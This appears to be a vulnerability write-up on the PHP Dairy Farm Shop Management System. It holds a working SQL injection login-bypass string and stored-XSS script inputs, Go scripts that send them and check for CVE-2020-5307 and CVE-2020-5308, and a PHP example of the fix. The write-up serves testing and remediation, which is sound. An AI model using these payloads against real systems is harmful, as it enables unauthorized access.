Dairy Farm Shop Management System Project (DFSMS)
Product overview
Dairy Farm Shop Management System is a dairy farm management system built on PHP and MySQL.
System details
Language Used : PHP
Database : MySQL
User Interface Design : HTML, AJAX,JQUERY,JAVASCRIPT
Web Browser : Mozilla, Google Chrome, IE8, OPERA
Software : XAMPP / Wamp / Mamp/ Lamp (anyone)
Environment setup
Download: https://phpgurukul.com/?smd_process_download=1&download_id=10924
Installation steps:
Download the zip archive
Extract it and copy the dfsms folder
Paste it into the web root (for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)
Open phpMyAdmin (http://localhost/phpmyadmin)
Create the dfsms database
Import dfsms.sql (given inside the zip package in SQL file folder)
Visit http://localhost/dfsms
Default login credentials
Username: admin
Password: Test@123
A successful login confirms that the database connection is working.
CVE-2020-5307
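Vulnerability details
Name: Dairy Farm Shop Management System SQL injection vulnerability
Type: SQL injection
Severity: Critical
Source: https://www.exploit-db.com/exploits/47846
Page access
username: admin' or '1' = '1'; -- -
Password: any non-empty string
The login is bypassed successfully.
How it works
admin' or
The quote after admin breaks the original query by closing its string literal, the trailing comment removes everything that follows, and or '1' = '1' guarantees that the query condition is true.
Login logic
Original query: select ID from tbladmin where UserName='$adminuser' && Password='$password'
It becomes
select ID from tbladmin where UserName='admin' or '1' = '1'; -- -' && Password='a'
The query successfully returns the ID of the admin account.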
Implementation

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"strings"
)

func main() {
	url := "http://your-ip/dfsms/index.php"
	method := "POST"

	// URL-encoded login form; the username field carries the string shown above.
	payload := strings.NewReader(`username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=a&login=`)

	client := &http.Client{}
	req, err := http.NewRequest(method, url, payload)
	if err != nil {
		fmt.Println(err)
		return
	}
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	// Session cookie value as given in the original post.
	req.Header.Add("Cookie", "PHPSESSID=ogvk4oricas9oudnb7hb88kgjg")

	res, err := client.Do(req)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer res.Body.Close()

	body, err := io.ReadAll(res.Body)
	if err != nil {
		fmt.Println(err)
		return
	}

	// The check treats "Add Product" in the response as evidence of the logged-in page.
	if strings.Contains(string(body), "Add Product") {
		fmt.Println("存在CVE-2020-5307漏洞") // CVE-2020-5307 is present
	} else {
		fmt.Println("未检测到CVE-2020-5307漏洞") // CVE-2020-5307 not detected
	}
}
```

GitHub: -->link<--
CVE-2020-5308
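Vulnerability details
Name: PHPGurukul Dairy Farm Shop Management System cross-site scripting vulnerability
Type: cross-site scripting
Severity: Medium
Source: https://cinzinga.github.io/CVE-2020-5307-5308/
Visit http://your-ip/dfsms/add-category.php
Test input: category: <script>alert("category")</script>
code: <script>alert("code")</script>
Submit
A message reports that the category was added successfully.
Visit http://your-ip/dfsms/add-category.php
The XSS test payload can be seen taking effect.
How it works
CategoryName and CategoryCode are written straight to the database without any processing.
They are also displayed without any processing.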
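A hardened form of the two code paths explained above, added here as an example and not taken from the DFSMS source: the login lookup with bound parameters, and the category listing with output encoding. Assumptions: `$con` is an open mysqli connection, the function names `find_admin_id`, `h` and `render_category_row` are hypothetical, and `$password` arrives in whatever form the application already stores and compares.

```php
<?php
declare(strict_types=1);

// Added example, not DFSMS source. Function names are hypothetical; table and
// column names are the ones quoted on this page.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // fail loudly on DB errors

// CVE-2020-5307. The page's query interpolates input into the SQL text:
//   select ID from tbladmin where UserName='$adminuser' && Password='$password'
// Binding the values keeps them as data, so a quote in $adminuser cannot
// close the string literal or comment out the password check.
function find_admin_id(mysqli $con, string $adminuser, string $password): ?int
{
    $stmt = $con->prepare(
        'SELECT ID FROM tbladmin WHERE UserName = ? AND Password = ?'
    );
    $stmt->bind_param('ss', $adminuser, $password);
    $stmt->execute();
    $stmt->bind_result($id);
    $found = $stmt->fetch(); // true when a row matched, null when none did
    $stmt->close();
    return $found ? (int) $id : null;
}

// CVE-2020-5308. Encode stored values at output time so markup saved in
// CategoryName or CategoryCode is shown as text instead of being parsed.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_category_row(array $row): string
{
    return '<tr><td>' . h($row['CategoryName']) . '</td><td>'
        . h($row['CategoryCode']) . '</td></tr>';
}

// Constructed sample row holding the test strings used on this page.
$row = [
    'CategoryName' => '<script>alert("category")</script>',
    'CategoryCode' => '<script>alert("code")</script>',
];
echo render_category_row($row), PHP_EOL;
```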
Implementation

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"strings"
)

func main() {
	// Step 1: submit a category whose name contains a script tag.
	url := "http://your-ip/dfsms/add-category.php"
	method := "POST"

	payload := strings.NewReader(`category=%3Cscript%3Ealert%28%22thisisxssvulntest%22%29%3C%2Fscript%3E&categorycode=test&submit=`)

	client := &http.Client{}
	req, err := http.NewRequest(method, url, payload)
	if err != nil {
		fmt.Println(err)
		return
	}
	// Session cookie value as given in the original post.
	req.Header.Add("Cookie", "PHPSESSID=ogvk4oricas9oudnb7hb88kgjg")
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")

	res, err := client.Do(req)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer res.Body.Close()

	body, err := io.ReadAll(res.Body)
	if err != nil {
		fmt.Println(err)
		return
	}

	// Stop if the application did not confirm that the category was stored.
	if !strings.Contains(string(body), `Category added successfully.`) {
		fmt.Println("未检测到CVE-2020-5308漏洞") // CVE-2020-5308 not detected
		return
	}

	// Step 2: fetch the category list and look for the unescaped script tag.
	url2 := "http://your-ip/dfsms/manage-categories.php"
	method2 := "GET"

	client2 := &http.Client{}
	req2, err := http.NewRequest(method2, url2, nil)
	if err != nil {
		fmt.Println(err)
		return
	}
	req2.Header.Add("Cookie", "PHPSESSID=ogvk4oricas9oudnb7hb88kgjg")

	res2, err := client2.Do(req2)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer res2.Body.Close()

	body2, err := io.ReadAll(res2.Body)
	if err != nil {
		fmt.Println(err)
		return
	}

	// The tag coming back verbatim means the stored value is rendered without encoding.
	if strings.Contains(string(body2), `<script>alert("thisisxssvulntest")</script>`) {
		fmt.Println("存在CVE-2020-5308漏洞") // CVE-2020-5308 is present
	} else {
		fmt.Println("未检测到CVE-2020-5308漏洞") // CVE-2020-5308 not detected
	}
}
```

GitHub: -->link<--
References:
https://cinzinga.com/CVE-2020-5307-5308/
https://www.exploit-db.com/exploits/47846